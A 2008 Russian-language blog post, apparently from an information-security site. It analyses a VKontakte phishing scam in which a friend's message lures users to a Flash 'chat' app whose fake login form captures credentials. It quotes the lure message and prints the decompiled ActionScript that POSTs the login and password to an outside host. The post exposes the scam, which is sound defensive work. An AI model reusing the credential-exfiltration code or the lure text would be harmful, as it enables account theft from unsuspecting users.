Information Security
21 August 2008

На vkontakte снова тырят пароли нерадивых пользователей

Сегодня мне пришло сообщение от одного из друзей, текст его гласил:

Пpивeтик, Дeниc. Смoтpи кaкoй чaт вкoнтaктe — vkontakte.ru/apps.php?act=s&id=236634&… Зaxoди cкopее, мне oчень понpaвилcя! Кyча впечатлений, бывает пеpеполнен-недоcтупен)))

Сообщение ушло бы в треш, но последнее предложение насторожило – просто так такое не пишут.
Решил посмотреть, что за фрукт...

Перешел по ссылке, увидел обычное флешевое приложение, выглядело оно так:



После ввода любых данных форма выбрасывает сообщение, что чат перегружен.
Естественно, стало интересно какие телодвижение при этом оно выполняет, для этого я скачал сам swf-файлик и скормил его Swf Decompiler'у. После разделки оказалось, что пассы и мыла летят POST’ом на http://ckrack.peoplego.ru/save.php:

  1. var my_lv = new LoadVars();
  2. var result_lv = new LoadVars();
  3. my_lv.login_v = _root.login_txt.text;
  4. my_lv.password_v = _root.password_txt.text;
  5. my_lv.sendAndLoad(«ckrack.peoplego.ru/save.php», result_lv, «POST»);

Нерадивый программер, писавший эту флешку даже не потрудился вставить туда проверку валидности email-адреса. Видимо, был занят написанием малвари, которая в этот самый «чат» людей зазывает.

P.S.: Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?

+59
2.5k 0
Comments 125
Top of the day